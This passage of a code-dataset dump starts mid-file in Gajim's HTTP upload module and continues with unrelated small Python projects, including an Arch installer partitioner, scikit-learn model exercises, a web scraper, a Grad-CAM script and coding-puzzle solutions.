True\n size = GLib.format_size_full(int(self.max_file_size),\n GLib.FormatSizeFlags.IEC_UNITS)\n msg = _('File is too large, '\n 'maximum allowed file size is: %s') % size\n\n if invalid_file:\n raise FileError(msg)\n\n mime = mimetypes.MimeTypes().guess_type(path)[0]\n if not mime:\n mime = 'application/octet-stream' # fallback mime type\n self._log.info('Detected MIME type of file: %s', mime)\n\n transfer = HTTPFileTransfer(self._account,\n str(path),\n contact,\n mime,\n encryption,\n contact.is_groupchat)\n\n key = (contact.account, contact.jid)\n self._running_transfers[key].add(transfer)\n\n return transfer\n\n def _on_http_upload_state_changed(self,\n transfer: HTTPFileTransfer,\n _signal_name: str,\n state: FTState\n ) -> None:\n\n if state.is_finished:\n uri = transfer.get_transformed_uri()\n\n type_ = 'chat'\n if transfer.is_groupchat:\n type_ = 'groupchat'\n\n message = OutgoingMessage(account=transfer.account,\n contact=transfer.contact,\n message=uri,\n type_=type_,\n oob_url=uri)\n\n self._client.send_message(message)\n\n def _on_cancel_upload(self,\n transfer: HTTPFileTransfer,\n _signal_name: str\n ) -> None:\n\n transfer.set_cancelled()\n\n key = (transfer.account, transfer.contact.jid)\n self._running_transfers[key].discard(transfer)\n\n message = self._queued_messages.get(id(transfer))\n if message is None:\n return\n\n self._session.cancel_message(message, Soup.Status.CANCELLED)\n\n def _start_transfer(self, transfer: HTTPFileTransfer) -> None:\n if transfer.encryption is not None and not transfer.is_encrypted:\n transfer.set_encrypting()\n plugin = app.plugin_manager.encryption_plugins[transfer.encryption]\n if hasattr(plugin, 'encrypt_file'):\n plugin.encrypt_file(transfer,\n self._account,\n self._start_transfer)\n else:\n transfer.set_error('encryption-not-available')\n\n return\n\n transfer.set_preparing()\n self._log.info('Sending request for slot')\n self._nbxmpp('HTTPUpload').request_slot(\n jid=self.component,\n filename=transfer.filename,\n size=transfer.size,\n content_type=transfer.mime,\n callback=self._received_slot,\n user_data=transfer)\n\n def _received_slot(self, task: Task) -> None:\n transfer = cast(HTTPFileTransfer, task.get_user_data())\n\n try:\n result = task.finish()\n except (StanzaError,\n HTTPUploadStanzaError,\n MalformedStanzaError) as error:\n\n if error.app_condition == 'file-too-large':\n size_text = GLib.format_size_full(\n error.get_max_file_size(),\n GLib.FormatSizeFlags.IEC_UNITS)\n\n error_text = _('File is too large, '\n 'maximum allowed file size is: %s' % size_text)\n transfer.set_error('file-too-large', error_text)\n\n else:\n transfer.set_error('misc', str(error))\n\n return\n\n transfer.process_result(result)\n\n if (urlparse(transfer.put_uri).scheme != 'https' or\n urlparse(transfer.get_uri).scheme != 'https'):\n transfer.set_error('unsecure')\n return\n\n self._log.info('Uploading file to %s', transfer.put_uri)\n self._log.info('Please download from %s', transfer.get_uri)\n\n self._upload_file(transfer)\n\n def _upload_file(self, transfer: HTTPFileTransfer) -> None:\n transfer.set_started()\n\n assert transfer.put_uri is not None\n message = Soup.Message.new('PUT', transfer.put_uri)\n message.connect('starting', self._check_certificate, transfer)\n\n # Set CAN_REBUILD so chunks get discarded after they have been\n # written to the network\n message.set_flags(Soup.MessageFlags.CAN_REBUILD |\n Soup.MessageFlags.NO_REDIRECT)\n\n assert message.props.request_body is not None\n message.props.request_body.set_accumulate(False)\n\n assert message.props.request_headers is not None\n message.props.request_headers.set_content_type(transfer.mime, None)\n message.props.request_headers.set_content_length(transfer.size)\n for name, value in transfer.headers.items():\n message.props.request_headers.append(name, value)\n\n message.connect('wrote-headers', self._on_wrote_headers, transfer)\n message.connect('wrote-chunk', self._on_wrote_chunk, transfer)\n\n self._queued_messages[id(transfer)] = message\n self._set_proxy_if_available()\n self._session.queue_message(message, self._on_finish, transfer)\n\n def _check_certificate(self,\n message: Soup.Message,\n transfer: HTTPFileTransfer\n ) -> None:\n https_used, tls_certificate, tls_errors = message.get_https_status()\n if not https_used:\n self._log.warning('HTTPS was not used for upload')\n transfer.set_error('unsecure')\n self._session.cancel_message(message, Soup.Status.CANCELLED)\n return\n\n tls_error_set = convert_tls_error_flags(tls_errors)\n if app.cert_store.verify(tls_certificate, tls_error_set):\n return\n\n phrases = get_tls_error_phrases(tls_error_set)\n self._log.warning(\n 'TLS verification failed: %s (0x%02x)', phrases, tls_errors)\n transfer.set_error('tls-verification-failed', phrases[0])\n self._session.cancel_message(message, Soup.Status.CANCELLED)\n\n def _on_finish(self,\n _session: Soup.Session,\n message: Soup.Message,\n transfer: HTTPFileTransfer\n ) -> None:\n\n self._queued_messages.pop(id(transfer), None)\n\n key = (transfer.account, transfer.contact.jid)\n self._running_transfers[key].discard(transfer)\n\n if message.props.status_code == Soup.Status.CANCELLED:\n self._log.info('Upload cancelled')\n return\n\n if message.props.status_code in (Soup.Status.OK, Soup.Status.CREATED):\n self._log.info('Upload completed successfully')\n transfer.set_finished()\n\n else:\n phrase = Soup.Status.get_phrase(message.props.status_code)\n self._log.error('Got unexpected http upload response code: %s',\n phrase)\n transfer.set_error('http-response', phrase)\n\n def _on_wrote_chunk(self,\n message: Soup.Message,\n transfer: HTTPFileTransfer\n ) -> None:\n transfer.update_progress()\n if transfer.is_complete:\n assert message.props.request_body is not None\n message.props.request_body.complete()\n return\n\n bytes_ = transfer.get_chunk()\n assert bytes_ is not None\n self._session.pause_message(message)\n GLib.idle_add(self._append, message, bytes_)\n\n def _append(self, message: Soup.Message, bytes_: bytes) -> None:\n if message.props.status_code == Soup.Status.CANCELLED:\n return\n self._session.unpause_message(message)\n assert message.props.request_body is not None\n message.props.request_body.append(bytes_)\n\n @staticmethod\n def _on_wrote_headers(message: Soup.Message,\n transfer: HTTPFileTransfer\n ) -> None:\n bytes_ = transfer.get_chunk()\n assert bytes_ is not None\n assert message.props.request_body is not None\n message.props.request_body.append(bytes_)\n\n\nclass HTTPFileTransfer(FileTransfer):\n\n _state_descriptions = {\n FTState.ENCRYPTING: _('Encrypting file…'),\n FTState.PREPARING: _('Requesting HTTP File Upload Slot…'),\n FTState.STARTED: _('Uploading via HTTP File Upload…'),\n }\n\n _errors = {\n 'unsecure': _('The server returned an insecure transport (HTTP).'),\n 'encryption-not-available': _('There is no encryption method available '\n 'for the chosen encryption.')\n }\n\n def __init__(self,\n account: str,\n path: str,\n contact: types.ContactT,\n mime: str,\n encryption: Optional[str],\n groupchat: bool\n ) -> None:\n\n FileTransfer.__init__(self, account)\n\n self._path = path\n self._encryption = encryption\n self._groupchat = groupchat\n self._contact = contact\n self._mime = mime\n\n self.size = os.stat(path).st_size\n self.put_uri: Optional[str] = None\n self.get_uri: Optional[str] = None\n self._uri_transform_func: Optional[Callable[[str], str]] = None\n\n self._stream = None\n self._data: Optional[bytes] = None\n self._headers: dict[str, str] = {}\n\n self._is_encrypted = False\n\n @property\n def mime(self) -> str:\n return self._mime\n\n @property\n def contact(self) -> types.ContactT:\n return self._contact\n\n @property\n def is_groupchat(self) -> bool:\n return self._groupchat\n\n @property\n def encryption(self) -> Optional[str]:\n return self._encryption\n\n @property\n def headers(self) -> dict[str, str]:\n return self._headers\n\n @property\n def path(self) -> str:\n return self._path\n\n @property\n def is_encrypted(self) -> bool:\n return self._is_encrypted\n\n def get_transformed_uri(self) -> str:\n if self._uri_transform_func is not None:\n return self._uri_transform_func(self.get_uri)\n return self.get_uri\n\n def set_uri_transform_func(self, func: Callable[[str], str]) -> None:\n self._uri_transform_func = func\n\n @property\n def filename(self) -> str:\n return os.path.basename(self._path)\n\n def set_error(self, domain: str, text: str = '') -> None:\n if not text:\n text = self._errors[domain]\n\n self._close()\n super().set_error(domain, text)\n\n def set_finished(self) -> None:\n self._close()\n super().set_finished()\n\n def set_encrypted_data(self, data: bytes) -> None:\n self._data = data\n self._is_encrypted = True\n\n def _close(self) -> None:\n if self._stream is not None:\n self._stream.close()\n\n def get_chunk(self) -> Optional[bytes]:\n if self._stream is None:\n if self._encryption is None:\n self._stream = open(self._path, 'rb') # pylint: disable=consider-using-with # noqa: E501\n else:\n self._stream = io.BytesIO(self._data)\n\n data = self._stream.read(16384)\n if not data:\n self._close()\n return None\n self._seen += len(data)\n if self.is_complete:\n self._close()\n return data\n\n def get_data(self) -> bytes:\n with open(self._path, 'rb') as file:\n data = file.read()\n return data\n\n def process_result(self, result: HTTPUploadData) -> None:\n self.put_uri = result.put_uri\n self.get_uri = result.get_uri\n self._headers = result.headers\n","repo_name":"SWAG-MLG-420/Gajim_SWAG_MLG_M.O.D","sub_path":"venv/lib/python3.10/site-packages/gajim/common/modules/httpupload.py","file_name":"httpupload.py","file_ext":"py","file_size_in_byte":17620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73751671234","text":"# nota_de_trecere =4.5\n# nota = int(input('alege nota'))\n# print(\"okay\")\n# if nota> nota_de_trecere:\n# print(\"pass\")\n# print(\"okay\")\n# else:\n# print(\"fail\")\n#\n# print(\"true\")\n\n# a, b = input(\"introdu 2 numere intregi separate de spatiu\").split()\n# print(a,b)\n# a, b = int(a), int(b)\n#\n# operator = input(\"alege un operator (+ - * // )\")\n# if operator == \"+\":\n# print(a+b)\n# elif operator == \"-\":\n# print(a-b)\n# elif operator == \"*\":\n# print(a*b)\n# else:\n# print(a/b)\nnote_sesiune = input(\"introdu\")\nnote_sesiune = note_sesiune.split()\nprint(type(note_sesiune))","repo_name":"DanMicu/Intro_python","sub_path":"curs2/exercitii_if.py","file_name":"exercitii_if.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43145723970","text":"class Solution:\n def numIdenticalPairs(self, nums: List[int]) -> int:\n d = {}\n m = len(nums)\n for i in nums:\n if i in d:d[i]+=1\n else:d[i] = 1\n c = 0\n for i in d:\n c = c + d[i]*(d[i]-1)//2\n return c","repo_name":"hardik302001/leetcode","sub_path":"problems/number_of_good_pairs/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"28636767744","text":"import string\nimport parted\nimport subprocess\n\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\nclass Partitioner:\n\n def __init__(self):\n self.__devices = parted.getAllDevices()\n\n def refresh_devices(self):\n self.__devices = parted.getAllDevices()\n\n def get_devices(self):\n return self.__devices\n\n def print_devices(self) -> None:\n self.refresh_devices()\n for device in self.__devices:\n self.print_device(device)\n\n def print_device(self, device: parted.Device):\n print(color.BOLD + \"Disk {}\".format(device.model) + color.END)\n print(\"Size: {}\".format(self.bytes_to_readable(device.sectorSize * device.length)))\n print(\"Path: {}\".format(device.path))\n\n # Print partitions\n disk = parted.newDisk(device)\n print(color.BOLD + \"Partition\\t\\tSize\\t\\tFile System\" + color.END)\n for partition in disk.getPrimaryPartitions():\n path = partition.path\n size = self.bytes_to_readable(partition.geometry.length*device.sectorSize)\n type = partition.fileSystem.type\n print(\"{}\\t\\t{}\\t\\t{}\".format(path, size, type))\n print(\"\")\n\n def repartition(self, device: parted.Device) -> parted.Partition:\n disk = parted.newDisk(device)\n # Delete the current partitions and create a new one\n if disk.deleteAllPartitions() and disk.commit():\n new_partition = self.create_partition(device, 0, device.getLength()-1)\n\n # Format the newly created partition and whether or not the return code was 0\n self.format_partition(new_partition, \"ext4\")\n return new_partition\n raise Exception(\"Couldn't delete old partition table\")\n\n def format_partition(self, partition: parted.Partition, filesystem: string) -> None:\n # Format the newly created partition and whether or not the return code was 0\n result = subprocess.run([\"/usr/sbin/mkfs\", \"-F\", \"-t\", filesystem, partition.path])\n if result.returncode != 0:\n raise Exception(\"The partition {} could not be formatted\".format(partition.path))\n\n def create_partition(self, device: parted.Device, start: int, length: int=None, end: int=None, partition_type: int=parted.PARTITION_NORMAL, filesystem_type: string=\"ext4\") -> parted.Partition:\n disk = parted.newDisk(device)\n geometry = parted.Geometry(device=device, start=start, end=end, length=length)\n filesystem = parted.FileSystem(type=filesystem_type, geometry=geometry)\n constraint = parted.Constraint(device=device)\n\n partition = parted.Partition(disk, partition_type, geometry=geometry, fs=filesystem)\n\n # Create the partition\n if disk.addPartition(partition, constraint) and disk.commit():\n return partition\n\n raise Exception(\"Partition {} could not be created\".format(partition.path))\n\n def bytes_to_readable(self, size: int) -> string:\n if size >= (1024**4):\n return \"{} TB\".format(round(size / 1024**4, 1))\n elif size >= (1024**3):\n return \"{} GB\".format(round(size / 1024**3, 1))\n elif size >= (1024**2):\n return \"{} MB\".format(round(size / 1024**2, 1))\n elif size >= (1024**1):\n return \"{} KB\".format(round(size / 1024, 1))\n else:\n return \"{} bytes\".format(size)\n","repo_name":"sharkwouter/arch-installer","sub_path":"partitioner.py","file_name":"partitioner.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"16025552913","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV\nfrom sklearn.metrics import accuracy_score, mean_squared_error as MSE\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier as KNN\nfrom sklearn.ensemble import VotingClassifier, BaggingClassifier, RandomForestRegressor\nfrom sklearn.preprocessing import scale\n\n#DecisionTreeClassifier\n\ndata = pd.read_csv('data_breast.csv', sep = ',') #Cargado de la base\ndata = data.drop(data.iloc[:,12:], axis = 1) #Se eliminan las columnas que no sirven con _std y _worst\ndata = data.drop(columns = 'id') #Se elimina la columna de 'id' que no entrega información necesaria\n\nprint(data.head())\nprint(data.info())\n\nprint(pd.unique(data['diagnosis']))\ndata['diagnosis'] = pd.get_dummies(data['diagnosis'])['M']\n\nX = data.drop(columns = 'diagnosis')\ny = data['diagnosis']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, stratify = y, random_state= 420)\n\n\ndt = DecisionTreeClassifier(max_depth = 2, random_state = 420)\ndt.fit(X_train, y_train)\ny_pred = dt.predict(X_test)\n\nprint(accuracy_score(y_test, y_pred))\n\n\ndt1 = DecisionTreeClassifier(criterion = 'gini', random_state = 420)\ndt1.fit(X_train, y_train)\n\ny_pred1 = dt1.predict(X_test)\nprint(accuracy_score(y_test, y_pred1))\n\n#Hyperparameter Tuning for Trees\n\ndt = DecisionTreeClassifier(random_state = 420)\n\nparams_dt = {'max_depth' : [3, 4, 5, 6],\n 'min_samples_leaf' : [0.04, 0.06, 0.08],\n 'max_features' : [0.2, 0.4, 0.6, 0.8]}\n\n\n\ngrid_dt = GridSearchCV(estimator = dt, param_grid = params_dt, \n scoring = 'accuracy', cv = 10, n_jobs = -1)\n\ngrid_dt.fit(X_train, y_train)\n\nbest_hyperparams = grid_dt.best_params_\nprint(f'Best Hyperparameters:\\n {best_hyperparams}')\n\nbest_CV_score = grid_dt.best_score_\nprint(f'Best CV accuracy: \\n {best_CV_score}')\n\nbest_model = grid_dt.best_estimator_\n\ntest_acc = best_model.score(X_test, y_test)\nprint(f'Test set accuracy of BEST MODEL: {test_acc}')\n\n#DecisionTreeRegressor\n\ndf = pd.read_csv('auto-mpg.csv')\ndf = df.drop(columns = 'car name')\n\ndf['horsepower'] = df['horsepower'].astype(str)\ndf = df[df['horsepower'] != '?']\ndf['horsepower'] = pd.to_numeric(df['horsepower'])\n\nX = df.drop(columns = 'mpg')\ny = df['mpg']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state= 3)\n\ndt = DecisionTreeRegressor(max_depth = 4, min_samples_leaf = 0.1, random_state = 3)\ndt.fit(X_train,y_train)\ny_pred = dt.predict(X_test)\n\nmse_dt = MSE(y_test,y_pred)\nrmse_dt = mse_dt**(1/2)\n\n#K-Fold CrossValidation\n\ndt = DecisionTreeRegressor(max_depth = 4, min_samples_leaf = 0.14)\nMSE_CV = - cross_val_score(dt, X_train, y_train, cv = 10, scoring = 'neg_mean_squared_error', n_jobs = -1)\ndt.fit(X_train,y_train)\ny_predict_train = dt.predict(X_train)\ny_predict_test = dt.predict(X_test)\nprint('CV MSE: {:.2f}'.format(MSE_CV.mean()))\nprint('Train MSE: {:.2f}'.format(MSE(y_train,y_predict_train)))\nprint('Test MSE: {:.2f}'.format(MSE(y_test,y_predict_test)))\n\n\n#Ensemble Learning: Hard Voting\n\nSEED = 1\n\nX = data.drop(columns = 'diagnosis')\ny = data['diagnosis']\n\nX = scale(X)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state= SEED)\n\nlr = LogisticRegression(random_state = SEED)\nknn = KNN()\ndt = DecisionTreeClassifier(random_state = SEED)\n\nclassifiers = [('Logistic Regression', lr),\n ('K Nearest Neighbors', knn),\n ('Classification Tree', dt)]\n\nfor clf_name, clf in classifiers:\n \n clf.fit(X_train, y_train)\n \n y_pred = clf.predict(X_test)\n \n print('{:s} : {:.3f}'.format(clf_name, accuracy_score(y_test, y_pred)))\n\n\nvc = VotingClassifier(estimators = classifiers)\n\nvc.fit(X_train, y_train)\n\ny_pred = vc.predict(X_test)\n\nprint(f'Voting Classifier: {accuracy_score(y_test, y_pred)}')\n\n#Ensemble Learning: Bagging\n\nSEED_1 = 2\n\nX = data.drop(columns = 'diagnosis')\ny = data['diagnosis']\n\nX = scale(X)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, stratify = y, random_state= SEED_1)\n\ndt = DecisionTreeClassifier(max_depth = 4, min_samples_leaf=0.16, random_state = SEED_1)\n\nbc = BaggingClassifier(base_estimator = dt, n_estimators = 500, n_jobs = -1)\n\nbc.fit(X_train, y_train)\n\ny_pred = bc.predict(X_test)\n\naccuracy = accuracy_score(y_test, y_pred)\n\nprint(f'Accuracy of Bagging Classifier: {accuracy}')\n\nbc = BaggingClassifier(base_estimator = dt, n_estimators = 300, oob_score = True, n_jobs = -1)\n\nbc.fit(X_train, y_train)\n\ny_pred = bc.predict(X_test)\n\ntest_accuracy = accuracy_score(y_test, y_pred)\n\nprint(f'OOB Accuracy: {bc.oob_score_}')\n\n#RandomForest: Regressor \nX = df.drop(columns = 'mpg')\ny = df['mpg']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state= 3)\n\nrf = RandomForestRegressor(n_estimators = 400, min_samples_leaf = 0.12, random_state = 3)\n\nrf.fit(X_train, y_train)\n\ny_pred = rf.predict(X_test)\n\nrmse_test = MSE(y_test,y_pred)**(1/2)\n\nprint(f'Test set RMSE of RandomForest: {rmse_test}')\n\nimportances_rf = pd.Series(rf.feature_importances_, index = X.columns)\n\nsorted_importances_rf = importances_rf.sort_values()\n\nsorted_importances_rf.plot(kind = 'barh', color = 'lightgreen')\n\n#Hyperparameter Tuning for Random Forest\n\nparams_rf= {'n_estimators' : [300, 400, 500],\n 'max_depth' : [4, 6, 8],\n 'min_samples_leaf' : [0.1, 0.2],\n 'max_features' : ['log2', 'sqrt']}\n\ngrid_rf = GridSearchCV(estimator = rf, param_grid = params_rf, cv = 3, scoring = 'neg_mean_squared_error',\n verbose = 1, n_jobs = -1)\n\n\ngrid_rf.fit(X_train, y_train)\n\nbest_hyperparams = grid_rf.best_params_\nprint(f'Best Hyperparameters for Random Forest:\\n {best_hyperparams}')\n\nbest_model = grid_rf.best_estimator_\n\ny_pred = best_model.predict(X_test)\n\nrmse_test = MSE(y_test, y_pred)**(1/2)\nprint(f'Test set RMSE of RF: {rmse_test}')\n\n\n","repo_name":"alonsoriquelmev/DataCamp-TreeBasedModels","sub_path":"Tree Based Models.py","file_name":"Tree Based Models.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41390730243","text":"#Importing Libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n#Importing Dataset\r\ndataset = pd.read_csv('data.csv')\r\nX = dataset.iloc[:, :-1]\r\ny = dataset.iloc[:, 1]\r\ndataset.dtypes\r\nimport datetime as dt\r\ndataset['Date'] = pd.to_datetime(dataset.Date)\r\ndataset['Date']=dataset['Date'].map(dt.datetime.toordinal)\r\n#Splitting dataset intro training and test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\r\n#Feature scaling\r\n'''from sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nX_train = sc_X.fit_transform(X_train)\r\nX_test = sc_X.transform(X_test)\r\nsc_y = StandardScaler()'''\r\n\r\n\r\n#Fitting Simple Linear Regression to the Training set\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(X_train, y_train)\r\n\r\n#Predicting Test set Results\r\ny_pred = regressor.predict(X_test)\r\n\r\n#Visualising training set\r\nplt.scatter(X_train, y_train, color ='red')\r\nplt.plot(X_train, regressor.predict(X_train), color='blue')\r\nplt.title('year vs annual change')\r\nplt.xlabel('year')\r\nplt.ylabel('annual change')\r\nplt.show()\r\n\r\n#Visualising test set\r\nplt.scatter(X_test, y_test, color ='red')\r\nplt.plot(X_train, regressor.predict(X_train), color='blue')\r\nplt.title('year vs annual change')\r\nplt.xlabel('year')\r\nplt.ylabel('annual change')\r\nplt.show()","repo_name":"pragyakapoor/CrudeOilPriceAnalysis","sub_path":"Simple linear regression year.py","file_name":"Simple linear regression year.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33901253765","text":"import requests\nfrom pprint import pprint\nfrom bs4 import BeautifulSoup\n\nURL = \"https://comic.naver.com/webtoon/list.nhn?titleId=675554\"\nres = requests.get(URL)\nres.raise_for_status()\n\nsoup = BeautifulSoup(res.text, 'lxml')\n\n# 제목, 링크 구하기\ncartoons = soup.find_all(\"td\", attrs={\"class\":\"title\"})\nfor cartoon in cartoons:\n title = cartoon.a.get_text()\n link = \"https://comic.naver.com\" + cartoon.a[\"href\"]\n # rating = cartoon.find_next_sibling(\"td\").div.strong.get_text()\n print(title, link)\n\n \n# 평점 구하기\ncartoon_ratings = soup.find_all(\"div\", attrs={\"class\":\"rating_type\"})\nfor cartoon_rating in cartoon_ratings:\n rating = cartoon_rating.find(\"strong\").get_text()\n print(rating)\n","repo_name":"ririro93/web-scraping","sub_path":"nadocoding_scraping/8_bs4_gauss.py","file_name":"8_bs4_gauss.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3886524417","text":"import argparse\nimport os\nimport torch\n\nfrom torchvision.models import (\n resnet18, resnet34, resnet50, resnet101, resnet152,\n ResNet18_Weights, ResNet34_Weights, ResNet50_Weights, \n ResNet101_Weights, ResNet152_Weights\n)\nfrom PIL import Image\nfrom src.gradcam_vis import GradCamVisualize, save_image\n\ndef get_args():\n parser = argparse.ArgumentParser()\n \n parser.add_argument('--image-path',\n type=str,\n default='',\n help='Input image path')\n \n parser.add_argument('--model',\n type=str,\n default='resnet50',\n choices=[\n 'resnet18',\n 'resnet34',\n 'resnet50',\n 'resnet101',\n 'resnet152'\n ],\n help='choose model to use'\n )\n \n parser.add_argument('--layer',\n type=int,\n default=4,\n choices=[1, 2, 3, 4],\n help='Choose layer to visualize')\n \n parser.add_argument('--block',\n type=int,\n default=-1,\n help='choose block in layer')\n \n parser.add_argument('--output_dir',\n type=str,\n default='./output/',\n help='Output directory to save image')\n \n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n \n models = {\n 'resnet18' : (resnet18, ResNet18_Weights.DEFAULT),\n 'resnet34' : (resnet34, ResNet34_Weights.DEFAULT),\n 'resnet50' : (resnet50, ResNet50_Weights.DEFAULT),\n 'resnet101' : (resnet101, ResNet101_Weights.DEFAULT),\n 'resnet152' : (resnet152, ResNet152_Weights.DEFAULT)\n }\n \n args = get_args()\n \n if os.path.isfile(args.image_path) == False:\n raise Exception('Wrong path to image!')\n img_path = args.image_path \n \n if models.get(args.model) == None:\n raise Exception('Wrong name of model!')\n model, weights = models[args.model]\n model = model(weights=weights)\n preprocessing = weights.transforms()\n \n layers = {\n 1 : model.layer1,\n 2 : model.layer2,\n 3 : model.layer3,\n 4 : model.layer4\n }\n \n if layers.get(args.layer) == None:\n raise Exception('Wrong layer! Choose int form 1 to 4')\n layer = layers[args.layer]\n \n if len(layer) <= args.block:\n raise Exception(f'Wrong number of block! Choose int form 0 to {len(layer) - 1}')\n target_layers = [layer[args.block]] \n \n \n gradcamvis = GradCamVisualize(model, target_layers, \n torch.cuda.is_available(),\n preprocessing)\n \n vis = gradcamvis.process(img_path)\n img_with_vis = Image.fromarray(vis)\n \n if os.path.isdir(args.output_dir) == False:\n print(f'Creating new dir {args.output_dir}')\n os.mkdir(args.output_dir)\n\n save_image(img_with_vis, img_path, args.output_dir) \n \n \n ","repo_name":"mkeriy/gradcam_for_resnet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23569846211","text":"tests = int(input())\n\nfor z in range(tests):\n N, K = [int(x) for x in input().split()]\n last = 0\n openSpaces = {N: 1}\n for i in range(K):\n largest = max(openSpaces, key=int)\n openSpaces[largest] -= 1\n if openSpaces[largest] is 0:\n openSpaces.pop(largest)\n if largest % 2 is 0:\n val1 = largest // 2 - 1\n val2 = largest - val1 - 1\n elif largest is 1:\n val1 = 0\n val2 = 0\n else:\n val1 = largest // 2\n val2 = val1\n if not val1 in openSpaces:\n openSpaces[val1] = 0\n if not val2 in openSpaces:\n openSpaces[val2] = 0\n openSpaces[val1] += 1\n openSpaces[val2] += 1\n if i == K-1:\n print(\"Case #{}: {} {}\".format(z+1, max(val1, val2), min(val1, val2)))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2275.py","file_name":"2275.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11486941748","text":"from collections import defaultdict\n\ndef calc(set_a, set_b):\n res = set()\n for a in set_a:\n for b in set_b:\n res |= {a+b, a-b, b-a, a*b}\n if b != 0: res.add(a//b)\n if a != 0: res.add(b//a)\n return res\n\ndef solution(N, number):\n dp = defaultdict(set) # dp[i] : N을 i번 사용했을 때, 만들 수 있는 숫자들\n for i in range(1, 9):\n n = int(str(N)*i) # ex) 55, 555, ...\n dp[i].add(n)\n \n for j in range(1, i//2+1): # +,-,*,//\n dp[i] |= calc(dp[j], dp[i-j])\n \n if number in dp[i]:\n return i\n return -1\n","repo_name":"treejw/python-for-coding-test","sub_path":"dynamic_programming/expressed_as_N.py","file_name":"expressed_as_N.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39068902538","text":"from project.settings.base import BASE_DIR\nimport os\n\n# LOGGER \nENABLE_LOGGER = (os.environ.get('ENABLE_LOGGER') == 'True')\nif ENABLE_LOGGER:\n APP_LOG_FILENAME = BASE_DIR / 'logs/app.log'\n ERROR_LOG_FILENAME = BASE_DIR / 'logs/app-error.log'\n\n LOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'console': {\n 'format': '%(name)-12s %(levelname)-8s %(message)s',\n },\n 'file': {\n 'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n },\n 'verbose': {\n 'format': '{levelname} {asctime} {module} {process:d} {thread:d} {message}',\n 'style': '{',\n },\n 'simple': {\n 'format': '{levelname} {message}',\n 'style': '{',\n },\n 'django.server': {\n '()': 'django.utils.log.ServerFormatter',\n 'format': '[{server_time}] {message}',\n 'style': '{',\n }\n }, \n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'console'\n },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'formatter': 'file',\n 'filename': APP_LOG_FILENAME\n }\n },\n 'loggers': {\n '': {\n 'level': 'DEBUG',\n 'handlers': ['console', 'file']\n }\n }\n }","repo_name":"sanjaysikdar/pmpl-broadband-website-django","sub_path":"project/settings/config/lib/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
